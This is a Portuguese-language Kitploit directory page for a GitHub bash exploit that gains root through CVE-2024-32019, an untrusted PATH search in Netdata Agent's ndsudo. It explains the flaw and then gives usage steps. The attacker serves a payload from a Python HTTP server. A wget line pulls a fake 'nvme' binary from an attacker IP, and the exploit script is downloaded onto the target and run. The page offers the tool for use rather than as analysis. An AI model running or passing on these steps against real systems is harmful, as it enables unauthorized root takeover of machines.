Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32019-ndsudo — Exploit de escalonamento de privilégios baseado em Bash para CVE-2024-32019 na ferramenta ndsudo do Netdata Agent, aproveitando a busca PATH não confiável para executar binários arbitrários com permissões de root. | Kitploit
Ferramentas/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Exploit de escalonamento de privilégios baseado em Bash para CVE-2024-32019 na ferramenta ndsudo do Netdata Agent, aproveitando a busca PATH não confiável para executar binários arbitrários com permissões de root.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
12há 9 mesesAinda não revisado

A vulnerabilidade ndsudo permite que um atacante obtenha permissões de root ao explorar um caminho de pesquisa não confiável na ferramenta ndsudo, que faz parte do Netdata Agent. Isso pode permitir a execução de programas arbitrários com privilégios elevados se o atacante colocar um binário malicioso em um diretório gravável e modificar a variável de ambiente PATH de acordo.

A vulnerabilidade ndsudo, identificada como CVE-2024-32019, afeta versões da ferramenta ndsudo incluídas no Netdata Agent, especificamente versões v1.45.0 e anteriores. Essa vulnerabilidade permite que atacantes escalem privilégios em sistemas onde a ferramenta está instalada.

Como a Vulnerabilidade Funciona:

Mecanismo de Exploração:-

Caminho de Pesquisa Não Confiável: A ferramenta ndsudo usa a variável de ambiente PATH para localizar comandos externos. Um atacante pode manipular essa variável para apontar para um diretório que ele controla.

Execução de Binários Maliciosos: Ao colocar um executável malicioso com o mesmo nome de um comando que o ndsudo tem
permissão para executar (ex., nvme) em um diretório gravável, o atacante pode executar código arbitrário com permissões de root.

Complexidade do Ataque:-

Baixa Complexidade: O ataque não requer habilidades avançadas; um script bash facilmente criado pode ser usado para escalonamento de privilégios, tornando-o acessível a muitos potenciais atacantes.

Impacto da Vulnerabilidade:-

Escalonamento de Privilégios: A exploração bem-sucedida permite que um atacante obtenha acesso root, o que pode levar ao controle total sobre o sistema afetado.

Riscos Potenciais: Isso pode resultar em acesso não autorizado a dados, manipulação do sistema e exploração adicional de recursos de rede.

ESCALONAMENTO DE PRIVILÉGIOS Criei dois scripts bash para obter facilmente acesso de usuário a root. Siga os passos conforme mencionado abaixo:-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Agora crie um servidor python:

root@kitploit:~
  python3 -m http.server 8080

Abra o arquivo ndsudo_exploit.sh usando gedit ou pluma, o que estiver disponível. Você verá o comando wget assim:

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Altere o endereço IP para o IP da sua própria máquina

Agora vá para a máquina alvo, abra o terminal e faça o seguinte:

root@kitploit:~
  wget http://<seu-ip>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Baixar ferramenta